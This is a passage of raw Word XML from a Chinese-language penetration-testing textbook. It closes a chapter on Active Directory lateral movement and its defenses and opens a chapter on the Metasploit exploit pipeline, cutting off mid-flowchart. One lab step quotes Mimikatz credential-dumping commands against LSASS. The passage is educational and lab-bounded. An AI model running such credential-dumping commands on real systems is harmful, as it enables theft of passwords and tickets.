        <w:t xml:space="preserve"> LSASS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的凭据（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">privilege::debug</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sekurlsa::logonpasswords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），观察导出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NTLM hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberos tickets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的输出，但绝不用于攻击其他系统。记录凭据导出原理，思考</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Credential Guard </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如何阻止此类读取。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1163"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Active Directory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供了集中身份管理与域信任基础，Kerberos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议通过票据机制实现安全的单点登录，票据（TGT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ST）封装了用户身份与授权，但票据本身成为高价值攻击目标。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1163"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">横向移动的本质是滥用域内信任与凭据复用机制，Pass-the-Hash、Pass-the-Ticket</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和票据伪造等技术分别违反了“hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不应等价于密码”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“票据仅属于原会话”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“票据只能由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签发”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等安全假设。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1163"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">有效的防御必须采取分层架构：管理隔离（Tier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模型）、凭据保护（Protected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Users、Credential </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Guard）、Kerberos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议加固（FAST、AES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密、krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">轮换），并结合健全的审计策略和基于异常的监控（如使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架映射的检测规则），将检测范围从单条日志提升到行为关联分析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：重点关注</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Enterprise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">矩阵中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Credential Access”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Lateral Movement”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">战术，以及相应技术（T1003</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS Credential Dumping、T1550 Use Alternate Authentication Material、T1558 Steal or Forge Kerberos Tickets、T1021 Remote Services </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）。该知识库提供了攻击行为描述、检测建议和缓解措施，是蓝队构建检测规则的权威参考。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OffSec PEN-200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：课程中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Active Directory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块提供了系统化的实验室环境，演示从域用户到域管理员的完整路径，其中对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击和横向移动有深入但以授权实操为导向的讲解，适合进一步学习。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">微软官方安全文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">《Best Practices for Securing Active </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory》（中文版：保护</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Active Directory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的最佳实践）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">《Kerberos protocol registry entries and KDC configuration keys in Windows》</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">《Securing Domain Controllers Against Attack》</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">《Deploy Credential Guard》</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这些官方指南详细覆盖了本节提及的所有加固和检测配置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">《Hacking Exposed 7》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（McClure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Active Directory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防章节，以攻防双方视角讨论</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击和防御；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">《The Detection and Response Playbook for Active </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Directory》（Mandiant）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等厂商白皮书也可作为检测策略补充。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">承前启后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在掌握了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">单机提权的原理与域内横向移动的攻防理念之后，下一节我们将把这些技术与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">集成，探讨如何通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话在内网中实现自动化后渗透与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pivoting，并进一步展示蓝队针对此类活动的检测与阻断策略。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="295"/>
    <w:bookmarkEnd w:id="296"/>
    <w:bookmarkStart w:id="312" w:name="metasploit-框架从扫描到-getshell-全链路"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">17 Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架:从扫描到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> getshell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">全链路</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="297" w:name="metasploit-模块体系与-meterpreter"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">17.1 Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块体系与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在深入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的具体攻击模块之前，我们必须先理解其最核心的设计哲学：将一次完整的渗透攻击过程，从漏洞触发到取得控制权，解构并标准化为一系列可复用、可组合的软件模块。这种架构不仅是工具设计的胜利，更是对攻击逻辑的深刻抽象，也为防御者理解攻击者行为模式提供了清晰的蓝图。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">【前置依赖与法律声明】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本节所讨论的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">投递，其底层依赖的网络连通性（TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接、端口监听、回连）与操作系统控制流（进程创建、内存管理）已分别在馆藏《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 13–18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（进程/内存/系统调用）与第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 24–28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（TCP/IP/路由）中详细阐述。本章直接在此基础上构建框架攻击链路。本章的授权靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2/3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的搭建与环境准备，请回指本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令与操作仅限在读者完全自建的隔离实验室环境，或官方授权的专用靶机（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Rapid7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">官方发布的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploitable 2/3、OWASP Broken Web Applications </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">等）上执行。严禁将任何技术用于未获得明确书面授权的系统。实验网络必须与生产环境及互联网物理或逻辑隔离。未经授权访问他人计算机系统是违法行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者面临的核心挑战在于，不同的目标系统存在不同的漏洞，触发漏洞后的利用方式也千差万别，而获得初始控制权后需要执行的操作（如远程管理、信息窃取）又相对固定。如何将“发现并触发一个特定漏洞”与“建立稳定的控制通道”这两个任务解耦，以最大化代码复用和攻击效率，是其核心诉求。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：如果攻击者的工具链是高度模块化的，那么防御的关键就在于识别并阻断这条链条上的关键环节。理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的模块体系，有助于蓝队从“攻击载荷的行为特征”、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“模块间的组合模式”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以及“框架本身产生的流量指纹”等维度，构建超越简单</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签名匹配的纵深检测策略。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="297"/>
    <w:bookmarkStart w:id="298" w:name="漏洞利用载荷会话标准化流水线"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">17.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“漏洞—利用—载荷—会话”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准化流水线</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架将一次典型攻击流程抽象为图</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17-1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所示的标准化流水线。这一思想直接催生了其核心的模块体系，使得一次攻击可以通过在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中依次选择、配置并运行不同模块来完成。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flowchart LR</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A[扫描与漏洞识别&lt;br&gt;Auxiliary/Scanner]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">B{漏洞存在?};</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B -- Yes --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">C[选择并配置&lt;br&gt;Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块];</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> C --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">D[选择并配置&lt;br&gt;Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块];</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> D --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">E{目标环境&lt;br&gt;需特殊编码?};</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
